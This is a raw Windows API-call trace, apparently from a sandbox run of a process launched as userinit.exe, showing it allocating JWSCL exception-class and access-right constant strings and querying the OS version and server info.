[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a2f1c8*="EJwsclInvalidAceMismatch") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a2f1b0*="EJwsclRevisionMismatchException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a2f198*="EJwsclInvalidACEException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a2f180*="EJwsclReadOnlyPropertyException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a2f168*="EJwsclDuplicateListEntryException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a2f150*="EJwsclIndexOutOfBoundsException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a2f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a2f120*="EJwsclInvalidKnownSIDException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a2f108*="EJwsclInvalidComputer") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a2f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a2f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a2f0c0*="EJwsclInvalidSIDException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a2f0a8*="EJwsclInvalidSecurityListException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a2f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a2f078*="EJwsclEmptyACLException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a2f060*="EJwsclNILParameterException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a2f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a2f030*="EJwsclInvalidObjectArrayException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a2f018*="EJwsclProcessIdNotAvailable") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a2f000*="EJwsclWinCallFailedException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a2efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a2efd0*="EJwsclNotImplementedException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a2efb8*="EJwsclAccessTypeException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a2efa0*="EJwsclAdjustPrivilegeException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a2ef88*="EJwsclPrivilegeCheckException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a2ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a2ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a2ef40*="EJwsclPrivilegeException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a2ef28*="EJwsclNotEnoughMemory") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a2ef10*="EJwsclInvalidTokenHandle") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a2eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a2eee0*="EJwsclDuplicateTokenException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a2eec8*="EJwsclInvalidOwnerException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a2eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a2ee98*="EJwsclTokenPrimaryException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a2ee80*="EJwsclTokenImpersonationException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a2ee68*="EJwsclTokenInformationException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a2ee50*="EJwsclSharedTokenException") returned 1
[0189.651] SysReAllocStringLen (in: pbstr=0x2a2ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a2ee38*="EJwsclOpenProcessTokenException") returned 1
[0189.652] SysReAllocStringLen (in: pbstr=0x2a2ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a2ee20*="EJwsclOpenThreadTokenException") returned 1
[0189.652] SysReAllocStringLen (in: pbstr=0x2a2ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a2ee08*="EJwsclSecurityException") returned 1
[0189.652] SysReAllocStringLen (in: pbstr=0x2a2edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a2edf0*="Exception") returned 1
[0189.652] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.652] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0189.652] GetVersionExA (in: lpVersionInformation=0x12f474*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x2d0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x9c\xf4\x12") | out: lpVersionInformation=0x12f474*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0189.652] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0189.652] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0189.657] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0189.657] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x12f4f8 | out: bufptr=0x12f4f8) returned 0x0
[0189.753] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0189.753] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0189.753] NetApiBufferFree (Buffer=0x2f1d00) returned 0x0
[0189.753] SetErrorMode (uMode=0x8000) returned 0x1
[0189.753] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0189.753] SetErrorMode (uMode=0x1) returned 0x8000
[0189.753] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0189.755] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0189.756] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0189.757] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2ec40*="DELETE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ec30*="READ_CONTROL") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2ec20*="WRITE_OWNER") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ec10*="WRITE_DAC") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a2ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a2ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a2ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a2ebd0*="FILE_WRITE_DATA") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a2ebc0*="FILE_READ_DATA") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a2ebb0*="FILE_ALL_ACCESS") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2eb80*="STANDARD_RIGHTS_READ") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2eb70*="STANDARD_RIGHTS_ALL") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2eb50*="DELETE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2eb40*="READ_CONTROL") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2eb30*="WRITE_OWNER") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2eb20*="WRITE_DAC") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a2eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a2eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a2eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a2eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a2ead0*="TOKEN_QUERY_SOURCE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a2eac0*="TOKEN_QUERY") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a2eab0*="TOKEN_IMPERSONATE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a2eaa0*="TOKEN_DUPLICATE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a2ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2ea80*="TOKEN_ALL_ACCESS") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2ea50*="STANDARD_RIGHTS_READ") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2ea40*="STANDARD_RIGHTS_ALL") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2ea30*="DELETE") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ea20*="READ_CONTROL") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2ea10*="WRITE_OWNER") returned 1
[0189.759] SysReAllocStringLen (in: pbstr=0x2a2ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ea00*="WRITE_DAC") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e9f0*="TIMER_MODIFY_STATE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a2e9e0*="TIMER_QUERY_STATE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e9d0*="TIMER_ALL_ACCESS") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e9a0*="STANDARD_RIGHTS_READ") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e990*="STANDARD_RIGHTS_ALL") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e980*="DELETE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e970*="READ_CONTROL") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e960*="WRITE_OWNER") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e950*="WRITE_DAC") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a2e940*="SECTION_EXTEND_SIZE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a2e930*="FILE_MAP_READ") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a2e920*="FILE_MAP_WRITE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a2e910*="FILE_MAP_COPY") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a2e900*="FILE_MAP_ALL_ACCESS") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e8d0*="STANDARD_RIGHTS_READ") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e8b0*="DELETE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e8a0*="READ_CONTROL") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e890*="WRITE_OWNER") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e880*="WRITE_DAC") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e870*="MUTEX_MODIFY_STATE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e860*="MUTEX_ALL_ACCESS") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e840*="STANDARD_RIGHTS_WRITE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e830*="STANDARD_RIGHTS_READ") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e820*="STANDARD_RIGHTS_ALL") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e810*="DELETE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e800*="READ_CONTROL") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e7f0*="WRITE_OWNER") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e7e0*="WRITE_DAC") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e7d0*="EVENT_MODIFY_STATE") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e7c0*="EVENT_ALL_ACCESS") returned 1
[0189.760] SysReAllocStringLen (in: pbstr=0x2a2e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e790*="STANDARD_RIGHTS_READ") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e780*="STANDARD_RIGHTS_ALL") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e770*="DELETE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e760*="READ_CONTROL") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e750*="WRITE_OWNER") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e740*="WRITE_DAC") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a2e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a2e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e700*="STANDARD_RIGHTS_WRITE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e6f0*="STANDARD_RIGHTS_READ") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e6d0*="DELETE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e6c0*="READ_CONTROL") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e6b0*="WRITE_OWNER") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e6a0*="WRITE_DAC") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a2e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a2e680*="JOB_OBJECT_TERMINATE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a2e670*="JOB_OBJECT_QUERY") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a2e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a2e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a2e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e620*="STANDARD_RIGHTS_WRITE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e610*="STANDARD_RIGHTS_READ") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e600*="STANDARD_RIGHTS_ALL") returned 1
